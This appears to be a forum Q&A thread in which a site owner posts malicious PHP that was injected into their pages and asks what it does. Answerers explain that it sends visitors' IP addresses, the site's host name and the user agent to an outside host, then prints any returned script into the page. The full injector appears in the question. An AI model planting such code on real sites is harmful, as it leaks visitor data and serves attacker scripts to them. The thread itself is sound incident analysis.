Login/Register
Unauthorised code placed on web pages
Asked Answered
Solved phpsecuritycurlcracking
M

2

7

Recently a website I have been involved with was hacked with unauthorised code being placed on a number of pages. I was just wondering if anyone could shed any light onto what exactly this code does, and what benefit it would be to the user who placed it on these pages.

<?php
#31e3cd#
error_reporting(0); ini_set('display_errors',0); $wp_okpbo35639 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_okpbo35639) && !preg_match ('/bot/i', $wp_okpbo35639))){
$wp_okpbo0935639="http://"."html"."-href".".com/href"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_okpbo35639);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_okpbo0935639);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_35639okpbo =   curl_exec ($ch); curl_close($ch);}
if ( substr($wp_35639okpbo,1,3) === 'scr' ){ echo $wp_35639okpbo; }
#/31e3cd#
?>

Above is the code, as it appeared on the pages. I have played around with this code and it seems to get user information using:

$_SERVER['HTTP_USER_AGENT']

It is then combined into a url similar to the one below, but with the user information from above added to the url

http://html-href.com/href/?ip=::1&referer=localhost&ua=

I know curl is used in the transfer of data but where exactly is this information getting sent and what is its purpose?

Molybdic answered 7/1, 2014 at 15:10 Comment(0)
K
7

The code makes a call to the URL you noted, sending along the user's IP, your site's domain, and the user's useragent string. It's then printing onto your site any code it receives from the cURL request. The code received could be anything. It could be HTML, JavaScript, or any other client side code. It's probably not server-side code since there's no eval() running the code received.

It appears to target Internet Explorer, Chrome, and FireFox browsers, but not crawlers/bots.

EDIT: As FDL pointed out in his comment, this appears to be printing only if it receives a string where the second, third, and fourth characters are scr, meaning it likely only prints to the page if it received a <script> tag.

Ketchum answered 7/1, 2014 at 15:15 Comment(7)
It's likely to be JS, since it's checking for substring of scr as the 2nd 3rd and 4th characters (which would match <scriptReflate
Good call. I hadn't thought of 'script' (I'm terrible at word games!). As a result it appears to only be printing the resulting string if it's JavaScript.Ketchum
Is the returned content likely to cause damage to a users machine? Is it just returning a string or could the returned content be executed, perhaps to exploit a vulnerability in one of these browsers?Molybdic
The returned content is likely to be an exploit targeted at FireFox or Internet Explorer. The string returned is only printed if it contains a <script> tag, so it is code to be executed. Assume it's malicious and can either cause damage or perform unauthorized actions on behalf of the user's browser or machine.Ketchum
@RobertRozas you're right. Chrome's UA string contains "Like Gecko" in it.Ketchum
Thanks for the replies, I think i have a better idea of what this code is doing now. We have the IP address of the user who accessed the site via FTP, its a location in Spain but I don't know if there is anything we can do with this information.Molybdic
The best thing you can do is look into ways to better secure your server (maybe post on ServerFault?). It's my understanding that FTP is insecure and SFTP/SCP are better alternatives. No need to thank us. The best way you can show gratitude is by voting for questions/answers on SO and accepting the best answer to your questions.Ketchum
D
1

$_SERVER['HTTP_USER_AGENT'] is used to check the kind of web browser (or can be a crawler) from which the client requests the resource based on the URL. For instance with this snippet preg_match ('/Gecko|MSIE/i', $wp_okpbo35639), it is used to check if the client browser is Firefox(Gecko) or IE(MSIE). But this is not a foolproof way to determine the source browser as user-agents can easily be changed or switched.

Detector answered 7/1, 2014 at 15:21 Comment(0)

© 2022 - 2025 — McMap. All rights reserved.